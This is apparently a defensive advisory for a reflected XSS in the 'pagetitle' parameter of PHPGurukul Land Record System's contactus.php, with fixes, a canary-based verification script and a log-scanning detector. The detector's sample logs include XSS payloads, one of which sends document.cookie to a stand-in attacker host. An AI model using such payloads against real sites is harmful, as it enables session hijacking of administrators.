CVE-2024-57686

9.8 CRITICAL

📋 TL;DR

A reflected Cross-Site Scripting (XSS) vulnerability in PHPGurukul Land Record System v1.0 allows a remote attacker to inject script via the 'pagetitle' parameter of /landrecordsys/admin/contactus.php. Because the payload is reflected straight from the request, the attacker needs a victim, typically an administrator, to open a crafted link; the script then runs in that browser with access to whatever the admin session can do. Organizations running this version of the land record system are affected.

💻 Affected Systems

Products:
  • PHPGurukul Land Record System
Versions: v1.0
Operating Systems: Any OS running PHP
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the default installation and requires no special configuration to be exploitable.

📦 What is this software?

PHPGurukul Land Record System is a small PHP and MySQL web application distributed by PHPGurukul as a downloadable project. It ships with an admin panel under /landrecordsys/admin/, which is where the affected contactus.php page lives.
⚠️ Risk & Real-World Impact

🔴 Worst Case

An attacker who gets an administrator to open a crafted link can steal the admin session cookie, perform administrative actions from the victim's browser, deface the site, or redirect users to malicious pages; admin-level control of the application can then serve as a foothold for further compromise.

🟠 Likely Case

Session hijacking of admin accounts leading to unauthorized data access, modification of land records, or installation of backdoors through whatever the admin panel allows.

🟢 If Mitigated

Once the reflected value is output-encoded the injected script no longer executes; what remains is the ordinary phishing risk of a crafted link, since a reflected XSS needs the victim to open it in the first place.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The affected file lives under the admin directory. The "unauthenticated" rating above is inferred from the file path alone; whether contactus.php enforces an admin session before it reflects pagetitle has not been confirmed, so verify this against your own installation. Public proof-of-concept documentation exists.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not available

Restart Required: No

Instructions:

No official patch is available. Encode the 'pagetitle' value at the point where /landrecordsys/admin/contactus.php writes it into the response (the one-line change under Temporary Workarounds); with no vendor fix, this edit to the application source is the fix.

🔧 Temporary Workarounds

Input Validation and Output Encoding (all deployments)

Encode the 'pagetitle' value in contactus.php before it is written into the page. Modify contactus.php so the value is read and HTML-encoded before any output, for example: $pagetitle = htmlspecialchars($_GET['pagetitle'] ?? '', ENT_QUOTES, 'UTF-8');

The ?? '' guard avoids passing null when the parameter is absent. This encoding is correct only where the value lands in HTML body or attribute text; if the page also echoes it inside a <script> block or a URL, use the encoding for that context instead.

Web Application Firewall (WAF) Rules (all deployments)

Deploy WAF rules to block XSS payloads targeting the pagetitle parameter, e.g. requests whose decoded pagetitle value contains "<", "javascript:" or an on*= event handler.

A rule that only matches the literal strings <script> and javascript: is bypassed by event-handler payloads (<img src=x onerror=...>), mixed case and percent or entity encoding, so decode the value before matching and treat the rule as a stopgap, not a fix.

🧯 If You Can't Patch

  • Restrict access to the /landrecordsys/admin/ directory with IP allow-listing or web-server authentication, so a crafted link cannot reach the vulnerable page from the open internet.
  • Send the PHP session cookie with the HttpOnly and SameSite attributes (session.cookie_httponly and session.cookie_samesite in php.ini, or session_set_cookie_params()) so injected script cannot read the admin cookie; this does not stop actions the script performs from inside the victim's browser.
  • Implement a Content Security Policy (CSP) header to limit XSS impact; for it to block an inline injection, script-src must not include 'unsafe-inline', which means the application's own inline scripts have to be moved to files or nonced.

🔍 How to Verify

Check if Vulnerable:

Request /landrecordsys/admin/contactus.php?pagetitle=%3Cscript%3Ealert('XSS')%3C/script%3E (the payload percent-encoded) and inspect the raw HTML, e.g. with curl, rather than waiting for a popup: the page is vulnerable if the <script> tag comes back as-is instead of as &lt;script&gt;. A harmless marker string containing < > " ' works as well as a live alert() and is safer on a shared instance.

Check Version:

Check system documentation or configuration files for version information.

Verify Fix Applied:

After implementing fixes, test with same payload to ensure script does not execute and input is properly sanitized.
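The three verification steps above, as an added example that is not part of the original advisory or the vendor's code: a Python probe that sends a harmless canary instead of a live alert() payload and classifies whether the reflected value comes back raw, entity-encoded (fixed), or with only the angle brackets handled (still injectable in attribute context). The host name and the assumption that pagetitle is read from the query string are placeholders; only the path is from the advisory, and the sample responses are constructed.

```python
"""Reflection probe for the pagetitle parameter of contactus.php.

Added example, not vendor code. Instead of alert('XSS') it sends a canary
containing the four characters htmlspecialchars(ENT_QUOTES) must encode
and classifies how they come back. Run against a live host with:
    python3 probe.py http://TARGET/landrecordsys/admin/contactus.php
(TARGET is an assumption; the path is the one named in the advisory).
"""
import sys
import urllib.parse
import urllib.request

HEAD, META, TAIL = "xss7canary", "<>\"'", "7end"
CANARY = HEAD + META + TAIL          # xss7canary<>"'7end


def build_probe_url(page_url: str) -> str:
    """Percent-encode the canary into the pagetitle query parameter."""
    return page_url + "?" + urllib.parse.urlencode({"pagetitle": CANARY})


def classify_reflection(body: str):
    """Classify how the canary was reflected into the HTML response body.

    Returns (status, raw) where raw is the set of metacharacters that came
    back unencoded. 'partially-encoded' usually means '<' was handled but
    quotes were not, which still allows injection inside an attribute.
    """
    if CANARY in body:
        return "unencoded", set(META)
    start = body.find(HEAD)
    if start < 0:
        return "absent", set()
    start += len(HEAD)
    # The tail marker bounds the reflected region so markup after the value
    # (e.g. the closing </title>) is not mistaken for surviving characters.
    end = body.find(TAIL, start, start + 64)
    if end < 0:
        return "absent", set()
    raw = {c for c in META if c in body[start:end]}
    return ("partially-encoded" if raw else "neutralized"), raw


def probe(page_url: str, timeout: float = 10.0):
    """Fetch the page with the canary appended and classify the reflection."""
    req = urllib.request.Request(build_probe_url(page_url),
                                 headers={"User-Agent": "xss-reflection-probe"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", "replace")
    return classify_reflection(body)


# Constructed responses illustrating each outcome (not captured from a real host).
SAMPLE_VULNERABLE = '<title>xss7canary<>"\'7end</title>'
SAMPLE_FIXED = '<title>xss7canary&lt;&gt;&quot;&#039;7end</title>'
SAMPLE_ATTR_ONLY = '<input value="xss7canary&lt;&gt;"\'7end">'

if __name__ == "__main__":
    if len(sys.argv) == 2:
        print(probe(sys.argv[1]))
    else:
        for name, body in (("vulnerable", SAMPLE_VULNERABLE),
                           ("fixed", SAMPLE_FIXED),
                           ("attr-only", SAMPLE_ATTR_ONLY)):
            print(name, classify_reflection(body))
```

Run it once before and once after applying the htmlspecialchars() change: "unencoded" confirms the finding, "neutralized" confirms the fix, and "partially-encoded" means the value is encoded in one place but reflected elsewhere without quotes handled.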

📡 Detection & Monitoring

Log Indicators:

  • HTTP requests to contactus.php with script tags, event handlers (on*=) or their encoded forms such as %3Cscript%3E in the pagetitle parameter (payloads are almost always percent-encoded as they appear in access logs)
  • Unusual admin activity following XSS payload requests

Network Indicators:

  • HTTP GET requests containing malicious script patterns in query parameters
  • Unexpected redirects from the contactus.php page

SIEM Query:

source="web_logs" AND uri="/landrecordsys/admin/contactus.php" AND (query CONTAINS "<script" OR query CONTAINS "%3Cscript" OR query CONTAINS "javascript:" OR query CONTAINS "onerror=" OR query CONTAINS "%3C")

Access logs store the query string as it was sent, i.e. percent-encoded, so a query that only matches the literal "<script>" misses most real probes; decode the query field in the SIEM first or match the encoded forms as above.
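The log indicators and the SIEM query above, as an added example that is not from the advisory: a Python scanner over constructed combined-format access-log lines. It URL-decodes the pagetitle value (twice, to catch double encoding) before matching, which a literal search on the raw log text does not do, and restricts itself to the affected path. Addresses, timestamps and user agents in the sample lines are invented.

```python
"""Flag XSS probes against contactus.php in web-server access logs.

Added example, not part of the advisory. Matching on raw log text misses
most attacks because browsers and tools percent-encode the payload
(%3Cscript%3E); this decodes the pagetitle value before inspecting it.
"""
import re
import urllib.parse

TARGET_PATH = "/landrecordsys/admin/contactus.php"   # path named in the advisory

# Apache/nginx "combined" format: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# Tag openers, inline event handlers, javascript: URLs, and the entity or
# unicode escapes used to smuggle them. Applied to the decoded value only.
SUSPECT = re.compile(
    r"<\s*[a-z!/]|\bon[a-z]+\s*=|javascript\s*:|&#x?[0-9a-f]+;?|\\u00[0-9a-f]{2}",
    re.I,
)


def decode_pagetitle(query: str):
    """Return the decoded pagetitle value, or None if the parameter is absent."""
    values = urllib.parse.parse_qs(query, keep_blank_values=True).get("pagetitle")
    if not values:
        return None
    # parse_qs already decoded once; decode again so a double-encoded
    # payload (%253Csvg -> %3Csvg -> <svg) is also inspected in the clear.
    return urllib.parse.unquote(values[0])


def scan_line(line: str):
    """Return a finding dict for a suspicious request to contactus.php, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if path != TARGET_PATH:
        return None
    value = decode_pagetitle(query)
    if value is None:
        return None
    hit = SUSPECT.search(value)
    if hit is None:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
            "pagetitle": value, "matched": hit.group(0)}


def scan(lines):
    """Scan an iterable of log lines and return the findings in log order."""
    return [f for f in map(scan_line, lines) if f is not None]


# Constructed sample lines (addresses, times and agents are invented).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jan/2025:10:15:02 +0000] "GET /landrecordsys/admin/contactus.php?pagetitle=Contact+Us HTTP/1.1" 200 5321 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [03/Jan/2025:10:16:40 +0000] "GET /landrecordsys/admin/contactus.php?pagetitle=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5402 "-" "curl/8.4.0"',
    '198.51.100.23 - - [03/Jan/2025:10:16:41 +0000] "GET /landrecordsys/admin/contactus.php?pagetitle=%3Cimg%20src%3Dx%20onerror%3Dfetch(%27https://attacker.invalid/%27%2Bdocument.cookie)%3E HTTP/1.1" 200 5417 "-" "curl/8.4.0"',
    '198.51.100.23 - - [03/Jan/2025:10:16:42 +0000] "GET /landrecordsys/admin/contactus.php?pagetitle=%253Csvg%2520onload%253Dalert(1)%253E HTTP/1.1" 200 5388 "-" "curl/8.4.0"',
    '203.0.113.9 - - [03/Jan/2025:10:20:00 +0000] "GET /landrecordsys/index.php?pagetitle=%3Cscript%3E HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The benign "Contact Us" request and the probe against a different page produce no finding; the plain <script>, the onerror= event handler and the double-encoded <svg onload> payload all do, even though none of them contains the literal string <script> in the log line.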
